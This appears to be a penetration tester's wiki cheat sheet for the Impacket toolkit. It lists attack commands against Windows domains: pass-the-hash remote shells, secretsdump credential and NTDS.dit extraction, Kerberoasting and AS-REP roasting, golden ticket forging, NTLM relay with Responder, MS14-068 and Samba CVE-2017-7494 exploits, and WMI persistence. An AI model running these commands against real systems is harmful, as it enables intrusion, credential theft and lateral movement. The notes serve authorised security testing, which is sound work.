Impacket - CraigDonkin/Infrastructure GitHub Wiki
https://github.com/fortra/impacket
[TOC]
- Executes a command on the target via Task Scheduler Service
- Can pass the hash if don't have password
python3 atexec.py domain\user@host command
- creates a semi-interactive shell
- the victim will see cmd prompts or other programs pop up in their session
- not the best to use as a result
- can use put and get to upload and download files
- Can add an optional command to the end which won't return interactive shell just execute command
python3 dcomexec.py domain\user@host {command}
- notes here
-
Allows you to extract tables from an ntds.dit file
-
To extract the hash datatable using in a way to minimize space used, run:
esentutl.py /path/to/ntds.dit export -table datatable | grep -E "ATTk590689|ATTm3|ATTm590045|ATTr589970|ATTk589914|ATTk589879|ATTk589984|ATTk589918" > output -
impdump can be used to extract the hashes
-
Enumerates the users on a domain
-
Need valid credentials
python3 GetADUsers.py -all domain\User -dc-ip ip
- Gets the target's architecture
python3 getArch.py -target ip
- Queries target domain for user's that have the 'Do not require Kerberos preauthentication' set
- Exports the TGTs for cracking
- Can pass the hash as auth
- Use -no-pass when query a single user othersiws a badpwdcount will be added to the user
#Get TGT for specific user
python3 GetNPUsers.py domain\user -no-pass
#Get list of users with UF_DONT_REQUIRE_PREAUTH set (needs a user password)
python3 GetNPUsers.py domain\user:password
#Request TGTs for all users
python3 GetNPUsers.py domain\user:passwodd -request -outputfile out.txt -format hashcat
- Returns the targetUser's PAC
- Can use pass the hash
getPac.py -targetuser USER domain/username:password
- Allows you to request a service ticket and save it as ccache
- Can be used with pas the hash
python3 getST.py -hashes lm:nt -spn cifs/dc.fqdn domain/username
- If the account has constrained delegation you can use -impersonate to request the ticket on behalf of another user
- Allows you to impersonate a user, get the TGT and then save it in ccache
- This will impersonate the username (targt domain adminsetc) and have admin access on the DC
python3 getST.py -spn cifs/dc.fqdn domain\machin\share -impersonate username
- Can only impersonate the user on the DC, then use the ticket
export KRB5CCNAME=ticket.ccache
secretsdump.py -k -no-pass dc.fqdn
- Requests a TGT and saves it as ccache
- over pass the hash attack
- Can be used with pass the hash
python3 getTGT.py -hashes lm:nt domain/username
- using aeskey
python3 getTGT.py -dc-ip <ip> -aesKey <aeskey> <domain>/<username>
- Post exploitation
export KRB5CCNAME=user.ccache
klist
python3 secretsdump.py -k -no-pass -dc.fqdn
python3 psexec.py -dc-ip <ip> -target-ip <ip> -no-pass -k
- Performs SPN Listing
- Requires valid domain credentials
- Retrieves service account hashes in JTR format
- Can use pass the hash or a kerberos ticket previously compromised
python3 GetUserSPNs.py -request -dc-ip ip domain/user
- Then try and crack the tickets
- MS14-068 exploit
- Works against DC <= Windows 2008R2
- Requires a valid domain account
- Saves the golden ticket and returns a psexec session
python3 goldenPac.py -dc-ip ip domain/username:password@hostname
- Scans for listening DCERPC interfaces
- Try's to bind to each interface and reports if the interface is listed and/or listening
python3 ifmap.py host ip
- Answers a file read request with a predefined file based on the extension asked
- need to have a config file
bat = /tmp/batchfile
com = /tmp/comfile
exe = /tmp/exefule
- SMB2
- If 2 different file names are requested at the same share, the first one will work, the second only if the request is performed right away
- Could be used to get authentication requests and then code execution
- send users false logon.bat etc
- Can be used as part of MS15-011 exploit
- Can be used with pth
- enumerates users and sids
python3 lookupsid.py -target-ip ip user:password
- can be used with pth
- You have to have mimikatz running on the target machine
- within mimikatz on the target:
mimikatz # rpc::server
- From attacker laptop:
python3 mimikatz/py domain/user@ip
- You then get a mimikatz shell from which you can execute mimi commands
- add notes here
- can be used with PTH
- Use -windows-auth for windows auth
- interactive SQL client for mssql
python3 mssqlclient.py -p port domain/username:password@target
-
Once the command prompt returns can execute SQL commands
-
SQL> SELECT name FROM master.dbo.sysdatabases
- queries remote host for MSSQL instances
python3 mssqlinstance.py target
- retruns a list of sessions opened at the target hos
- You have to be able to resolve the domain machiens netbios names
- Can query the whole domain:
python3 netview.py -target ip domain/username
- Or just a single machine:
python3 netview.py -target ip username
- Getting errors when running - come back to
- NTFS read only explorer
- Example volumes
\\.\C- /dev/disk1
python3 ntfs-read.py -extract EXTRACT volume
- Relays NTLMv1/v2 hashes
- Uses a lot of protocols
- SMB
- MSSQL
- LDAP
- HTTP
- SMTP
- SMB signing needs to be disabled on the machine you're relaying too
- Use with other tools, for example
- Responder to intercept authentication attempts
responder.py -I interface -r -d -w
- CrackMapExec to generate a list of targets
cme smb iprange --gen-relay-list targets
- Responder to intercept authentication attempts
python3 ntlmrelay.py -tf targets -c command
- binds to the hostname:port and DCERP interface
- Calles each of the first 256 operation numbers
- Reports outcome of the call
python3 opdump.py host port interface version
- performs and ICMP6 ping
- Uses ICMP echo and echo-reply packets
python3 ping6.py sourceIP destIP
- ICMP echo ping
- If host is up get an echo-reploy packet
- Didn't work with python3 when I tried it
python ping.py sourceIP destIP
- Implementation pf psexec
- Uses RemComSVc for the shell
- Can be used with PTH
python3 psexec.py DOMAIN/USER@HOST command
- Use cmd.exe to get a shell rather than execute a single command
- Likely to get detected by AV
- Not working come back to
- Checks if an account is valid on the host using RDP
- Can be used with PTH
python3 rdp_check.py DOMAIN/USER@host
- parses offline registry hives
python3 registry_read.p hive enum_values -name name
- Remote registry manipulation
- Need to escape \ in the keyName
- Works with PTH
python3 reg.py Domain/User@host query -keyName key -s
- Dumps the remote RPC endpoint information
- Works with PTH
python3 rpcdump.py ipaddress
- Exploits CVE-2017-7494
- Uploads and executes a SO specified via SO paramater
python3 sambaPipe.py DOMAIN/USER@host -so /path/to/so
- downloads a list of users for the target system
- works with PTH
- Can export to a CSV
python samrdump.py DOMAIN/USER@Host
- dumps secrets from the target
- Can be used with PTH
- Can parse offline
- -system SYSTEM
- -bootkey BOOTKEY
- -security SECURITY
- -sam SAM
- -ntds NTDS
- Can specify the exec method when using -use-vss
- smbexec
- wmiexec
- mmcexec
- Extract only a single user
-just-dc-user username
- Extract only NTDS.DIT data
just-dcjust-dc-ntlm
python3 secretsdump.py DOMAIN/USER@Host
python3 secretsdump.py -ntds /path/to/offline/ntds.dit -system /path/to/system local
- manipulate services on a host
- start
- stop
- delete
- status
- config
- list
- create
- change
- Works with PTH
python3 services.py IEWIN7/[email protected] list
- Lets you list files on an SMB share
- Upload and download files
- Create directories
- Works with PTH
python3 smbclient.py DOMAIN/USER@Host
-
Once connected list shares and connect
sharesuse sharename
-
use ls/cd/pwd etc like with linux
-
use put/get to upload/download
- File is saved to directory you launched script from
- Similar to psexec
- Gives you semi interactive shell
- Executes commands on the target
- supports pth
- You will likely be executing commands as SYSTEM
python3 smbexec.py DOMAIN/USER@IP
- performs SMB relay attacks
- good blog https://evilenigma.blog/2017/03/19/lateral-movement-with-smbrelayx-py/
python3 smbrelayx -h victimIP -c command to execute
-
Trick victim into performing an SMB action, such as click a UNC path provided via phishing/soc eng
-
Command will then be relayed to victim host
- Creates and SMB server
- Need to be run as root
- won't enforce auth without
-username USERNAME-password PASSWORD
python3 smbserver.py shareName sharePath
- Packet sniffer
- Needs root to open socket
- need to specify the protocol
- tcp
- udp
- icmp
sudo python3 sniffer.py tcp
- Sniffer
- needs pcapy
apt-get install python-pcapy
- Specify the interface you want to sniff on or use 'any'
- Need to be root
sudo python sniff.py
- Splits pcap dump files
sudo python split.py pcapfile
- Can be used to generate Kerberos golden/silver tickets
- Then use it with psexec etc
python ticketer.py -nthash hash -domain-sid sid -domain domain username
export KRB5CCNAME='username.ccache'
python psexec.py -k -n DOMAIN/USERNAME@IP cmd
- If you have a ticket in kirbi format, you can convert it into ccache format for impacket.
- Make sure the kirbi ticket is decoded from base64 encoding and saved in
<username>.kirbi
echo -en <base64 ticket> | base64 -d > <user>.kirbi
python3 ticketConverter.py <user.kirbi> <user.ccache>
- Creates a semi interactive shell using WMI
- Can be used with PTH
- Need Admin
- Doesn't install anything on the host so stealthy
python3 wmiexec.py DOMAIN/Username@host
- can use
put src_file ds_pathand ``get file` - To execute commands on the localhost run
! cmd
- Persistence method
- Creates a WMI event ontarget
- works with PTH
python3 wmipersist.py DOMAIN/USER@HOST install -name name -vbs VBSfile -timer TIMER
- Provides a shell for executing WMI Query
- Works with PTH
python3 wmiquery.py DOMAIN/USER@Host